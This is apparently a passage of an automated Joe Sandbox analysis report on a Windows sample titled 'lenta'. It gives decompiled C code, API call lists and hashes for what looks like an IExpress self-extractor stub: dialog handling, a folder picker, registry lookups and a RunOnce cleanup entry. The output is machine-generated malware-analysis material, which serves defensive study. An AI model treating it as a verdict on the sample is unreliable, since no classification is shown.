                                                                                                                                                                                                                                              • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00972D40
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00972DAE
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00972DBD
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00972E0A
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00974518
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00974554
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                              • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                                                                                                                                                                                              • API String ID: 1002816675-2993962200
                                                                                                                                                                                                                                              • Opcode ID: b96c19942f4d07b80e2923a0d1a77125e3a7b56e0becf4e12ec8437c211cc3e1
                                                                                                                                                                                                                                              • Instruction ID: d61a9b559dd7a67e0425c1c90fc36ac0c154764a250288c1105ce1f11dd45835
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b96c19942f4d07b80e2923a0d1a77125e3a7b56e0becf4e12ec8437c211cc3e1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D51F5737783016BE724A7249C4AB7B369CEBC5B04F40C439F94DD51E2EBB48881E625
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 81%
                                                                                                                                                                                                                                              			E009734F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                                                                              				void* _t17;
                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                                                                              				struct HWND__* _t35;
                                                                                                                                                                                                                                              				struct HWND__* _t38;
                                                                                                                                                                                                                                              				void* _t39;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t9 = _a8 - 0x10;
                                                                                                                                                                                                                                              				if(_t9 == 0) {
                                                                                                                                                                                                                                              					__eflags = 1;
                                                                                                                                                                                                                                              					L19:
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					 *0x9791d8 = 1;
                                                                                                                                                                                                                                              					L20:
                                                                                                                                                                                                                                              					_push(_a4);
                                                                                                                                                                                                                                              					L21:
                                                                                                                                                                                                                                              					EndDialog();
                                                                                                                                                                                                                                              					L22:
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push(1);
                                                                                                                                                                                                                                              				_pop(1);
                                                                                                                                                                                                                                              				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                                                              				if(_t12 == 0) {
                                                                                                                                                                                                                                              					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                                                              					if(_a12 != 0x1b) {
                                                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L19;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t13 = _t12 - 0xe;
                                                                                                                                                                                                                                              				if(_t13 == 0) {
                                                                                                                                                                                                                                              					_t35 = _a4;
                                                                                                                                                                                                                                              					 *0x978584 = _t35;
                                                                                                                                                                                                                                              					E009743D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                                                              					__eflags =  *0x978184; // 0x1
                                                                                                                                                                                                                                              					if(__eflags != 0) {
                                                                                                                                                                                                                                              						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                                                              						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					SetWindowTextA(_t35, "lenta");
                                                                                                                                                                                                                                              					_t17 = CreateThread(0, 0, E00974FE0, 0, 0, 0x978798);
                                                                                                                                                                                                                                              					 *0x97879c = _t17;
                                                                                                                                                                                                                                              					__eflags = _t17;
                                                                                                                                                                                                                                              					if(_t17 != 0) {
                                                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						E009744B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						_push(_t35);
                                                                                                                                                                                                                                              						goto L21;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t23 = _t13 - 1;
                                                                                                                                                                                                                                              				if(_t23 == 0) {
                                                                                                                                                                                                                                              					__eflags = _a12 - 2;
                                                                                                                                                                                                                                              					if(_a12 != 2) {
                                                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					ResetEvent( *0x97858c);
                                                                                                                                                                                                                                              					_t38 =  *0x978584; // 0x0
                                                                                                                                                                                                                                              					_t25 = E009744B9(_t38, 0x4b2, 0x971140, 0, 0x20, 4);
                                                                                                                                                                                                                                              					__eflags = _t25 - 6;
                                                                                                                                                                                                                                              					if(_t25 == 6) {
                                                                                                                                                                                                                                              						L11:
                                                                                                                                                                                                                                              						 *0x9791d8 = 1;
                                                                                                                                                                                                                                              						SetEvent( *0x97858c);
                                                                                                                                                                                                                                              						_t39 =  *0x97879c; // 0x0
                                                                                                                                                                                                                                              						E00973680(_t39);
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						goto L20;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__eflags = _t25 - 1;
                                                                                                                                                                                                                                              					if(_t25 == 1) {
                                                                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					SetEvent( *0x97858c);
                                                                                                                                                                                                                                              					goto L22;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                              					TerminateThread( *0x97879c, 0);
                                                                                                                                                                                                                                              					EndDialog(_a4, _a12);
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973658
                                                                                                                                                                                                                                              0x00973644
                                                                                                                                                                                                                                              0x0097351b
                                                                                                                                                                                                                                              0x0097351d
                                                                                                                                                                                                                                              0x0097354f
                                                                                                                                                                                                                                              0x00973553
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097355f
                                                                                                                                                                                                                                              0x00973565
                                                                                                                                                                                                                                              0x0097357c
                                                                                                                                                                                                                                              0x00973581
                                                                                                                                                                                                                                              0x00973584
                                                                                                                                                                                                                                              0x0097359b
                                                                                                                                                                                                                                              0x009735a1
                                                                                                                                                                                                                                              0x009735a7
                                                                                                                                                                                                                                              0x009735ad
                                                                                                                                                                                                                                              0x009735b3
                                                                                                                                                                                                                                              0x009735b8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009735b8
                                                                                                                                                                                                                                              0x00973586
                                                                                                                                                                                                                                              0x00973588
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973590
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973590
                                                                                                                                                                                                                                              0x00973524
                                                                                                                                                                                                                                              0x00973535
                                                                                                                                                                                                                                              0x00973541
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973549
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • TerminateThread.KERNEL32(00000000), ref: 00973535
                                                                                                                                                                                                                                              • EndDialog.USER32(?,?), ref: 00973541
                                                                                                                                                                                                                                              • ResetEvent.KERNEL32 ref: 0097355F
                                                                                                                                                                                                                                              • SetEvent.KERNEL32(00971140,00000000,00000020,00000004), ref: 00973590
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 009735C7
                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,0000083B), ref: 009735F1
                                                                                                                                                                                                                                              • SendMessageA.USER32(00000000), ref: 009735F8
                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,0000083B), ref: 00973610
                                                                                                                                                                                                                                              • SendMessageA.USER32(00000000), ref: 00973617
                                                                                                                                                                                                                                              • SetWindowTextA.USER32(?,lenta), ref: 00973623
                                                                                                                                                                                                                                              • CreateThread.KERNEL32 ref: 00973637
                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 00973671
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                              • String ID: lenta
                                                                                                                                                                                                                                              • API String ID: 2406144884-2780258678
                                                                                                                                                                                                                                              • Opcode ID: cb31eaf1c9c840ba5555237a6c0b3f37b1a64bb9fb867e06dfc1cbe70ead930b
                                                                                                                                                                                                                                              • Instruction ID: 9510708d32e93eba871b465b91617b8399e5a94de0025b81815bafed9d4eea63
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb31eaf1c9c840ba5555237a6c0b3f37b1a64bb9fb867e06dfc1cbe70ead930b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9631917325C300BBD7201F25AC4EE2B3A68E7C5B11F50C929F61E952A1CB758981FA59
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                                                                              			E00974224(char __ecx) {
                                                                                                                                                                                                                                              				char* _v8;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                              				char* _v28;
                                                                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                                                                              				intOrPtr _v36;
                                                                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                              				char _t42;
                                                                                                                                                                                                                                              				char* _t44;
                                                                                                                                                                                                                                              				char* _t61;
                                                                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                                                                              				char* _t65;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                              				char _t67;
                                                                                                                                                                                                                                              				void* _t71;
                                                                                                                                                                                                                                              				char _t76;
                                                                                                                                                                                                                                              				intOrPtr _t85;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t67 = __ecx;
                                                                                                                                                                                                                                              				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                                                              				if(_t66 == 0) {
                                                                                                                                                                                                                                              					_t63 = 0x4c2;
                                                                                                                                                                                                                                              					L22:
                                                                                                                                                                                                                                              					E009744B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x9788c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x9787a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x978598;
					_v36 = 1;
					_v32 = E00974200;
					_v28 = 0x9788c0;
					 *0x97a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x97a288(_t32, 0x9788c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x9788c0 != 0) {
							E00971680(0x9787a0, 0x104, 0x9788c0);
						}
						 *0x97a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x9787a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x9788c0);
					_t61 = 0x9788c0;
					_t4 =  &(_t61[1]); // 0x9788c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x9788c0; // 0x12f1181
					_t44 = CharPrevA(0x9788c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x9788c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}




























                                                                                                                                                                                                                                              0x009742ce
                                                                                                                                                                                                                                              0x009742e4
                                                                                                                                                                                                                                              0x009742e4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009742ce

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00974236
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0097424C
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00974263
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0097427A
                                                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,009788C0,?,00000001), ref: 0097429F
                                                                                                                                                                                                                                              • CharPrevA.USER32(009788C0,012F1181,?,00000001), ref: 009742C2
                                                                                                                                                                                                                                              • CharPrevA.USER32(009788C0,00000000,?,00000001), ref: 009742D6
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00974391
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 009743A5
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                              • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                              • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                              • Opcode ID: 744428409c8e31bf1dbf3a817100a171e369cfb60cc1e69170e2aa505a1f2da1
                                                                                                                                                                                                                                              • Instruction ID: b3532e9bbc4ceb7d61c8cf30e526282ee028e4fe2b9bf3067821dd2afed8310b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 744428409c8e31bf1dbf3a817100a171e369cfb60cc1e69170e2aa505a1f2da1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18413873A44200AFE7119F74DC8DAAF7BB8EB85344F4484A9E92DA3252CB348C41D766
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E00972773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				char _v269;
                                                                                                                                                                                                                                              				CHAR* _v276;
                                                                                                                                                                                                                                              				int _v280;
                                                                                                                                                                                                                                              				void* _v284;
                                                                                                                                                                                                                                              				int _v288;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                                                                              				intOrPtr _t34;
                                                                                                                                                                                                                                              				int _t45;
                                                                                                                                                                                                                                              				int* _t50;
                                                                                                                                                                                                                                              				CHAR* _t52;
                                                                                                                                                                                                                                              				CHAR* _t61;
                                                                                                                                                                                                                                              				char* _t62;
                                                                                                                                                                                                                                              				int _t63;
                                                                                                                                                                                                                                              				CHAR* _t64;
                                                                                                                                                                                                                                              				signed int _t65;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t52 = __ecx;
                                                                                                                                                                                                                                              				_t23 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                                                              				_t62 = _a4;
                                                                                                                                                                                                                                              				_t50 = 0;
                                                                                                                                                                                                                                              				_t61 = __ecx;
                                                                                                                                                                                                                                              				_v276 = _t62;
                                                                                                                                                                                                                                              				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                                                              				if( *_t62 != 0x23) {
                                                                                                                                                                                                                                              					_t63 = 0x104;
                                                                                                                                                                                                                                              					goto L14;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t64 = _t62 + 1;
                                                                                                                                                                                                                                              					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                                                              					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                                                              					_t63 = 0x104;
                                                                                                                                                                                                                                              					_t34 = _v269;
                                                                                                                                                                                                                                              					if(_t34 == 0x53) {
                                                                                                                                                                                                                                              						L14:
                                                                                                                                                                                                                                              						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                                                              						goto L15;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if(_t34 == 0x57) {
                                                                                                                                                                                                                                              							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_push(_t52);
                                                                                                                                                                                                                                              							_v288 = 0x104;
                                                                                                                                                                                                                                              							E00971781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                                                              							_t59 = 0x104;
                                                                                                                                                                                                                                              							E0097658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                                                              							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                                                              								L16:
                                                                                                                                                                                                                                              								_t59 = _t63;
                                                                                                                                                                                                                                              								E0097658A(_t61, _t63, _v276);
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								if(RegQueryValueExA(_v284, 0x971140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                                                              									_t45 = _v280;
                                                                                                                                                                                                                                              									if(_t45 != 2) {
                                                                                                                                                                                                                                              										L9:
                                                                                                                                                                                                                                              										if(_t45 == 1) {
                                                                                                                                                                                                                                              											goto L10;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                              											_t45 = _v280;
                                                                                                                                                                                                                                              											goto L9;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											_t59 = 0x104;
                                                                                                                                                                                                                                              											E00971680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                                                              											L10:
                                                                                                                                                                                                                                              											_t50 = 1;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								RegCloseKey(_v284);
                                                                                                                                                                                                                                              								L15:
                                                                                                                                                                                                                                              								if(_t50 == 0) {
                                                                                                                                                                                                                                              									goto L16;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                                                              			}























                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CharUpperA.USER32(694569F9,00000000,00000000,00000000), ref: 009727A8
                                                                                                                                                                                                                                              • CharNextA.USER32(0000054D), ref: 009727B5
                                                                                                                                                                                                                                              • CharNextA.USER32(00000000), ref: 009727BC
                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00972829
                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00971140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00972852
                                                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00972870
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 009728A0
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 009728AA
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 009728B9
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 009727E4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                              • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                              • Opcode ID: 016747043a3c755a333ec930da2f0c1b4cc4624c49870cc0cbfc368572df4bcb
                                                                                                                                                                                                                                              • Instruction ID: b3b22ee7b48e79ff451dfb5c35cb250e20155748aac18febf68d12a7c517400e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 016747043a3c755a333ec930da2f0c1b4cc4624c49870cc0cbfc368572df4bcb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B41A572A18128AFDB249B64DC45AEE77BDEB95700F0084A9F58DD2100DB704EC5DFA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 62%
                                                                                                                                                                                                                                              			E00972267() {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				char _v836;
                                                                                                                                                                                                                                              				void* _v840;
                                                                                                                                                                                                                                              				int _v844;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t19;
                                                                                                                                                                                                                                              				intOrPtr _t33;
                                                                                                                                                                                                                                              				void* _t38;
                                                                                                                                                                                                                                              				intOrPtr* _t42;
                                                                                                                                                                                                                                              				void* _t45;
                                                                                                                                                                                                                                              				void* _t47;
                                                                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                                                                              				signed int _t51;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t19 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                              				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                              				if( *0x978530 != 0) {
                                                                                                                                                                                                                                              					_push(_t49);
                                                                                                                                                                                                                                              					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                              						_push(_t38);
                                                                                                                                                                                                                                              						_v844 = 0x238;
                                                                                                                                                                                                                                              						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                              							_push(_t47);
                                                                                                                                                                                                                                              							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                              							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                              								E0097658A( &_v268, 0x104, 0x971140);
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_push("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                              							E0097171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                              							_t42 =  &_v836;
                                                                                                                                                                                                                                              							_t45 = _t42 + 1;
                                                                                                                                                                                                                                              							_pop(_t47);
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								_t33 =  *_t42;
                                                                                                                                                                                                                                              								_t42 = _t42 + 1;
                                                                                                                                                                                                                                              							} while (_t33 != 0);
                                                                                                                                                                                                                                              							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                              						_pop(_t38);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_pop(_t49);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                              			}


                                                                                                                                                                                                                                              APIs
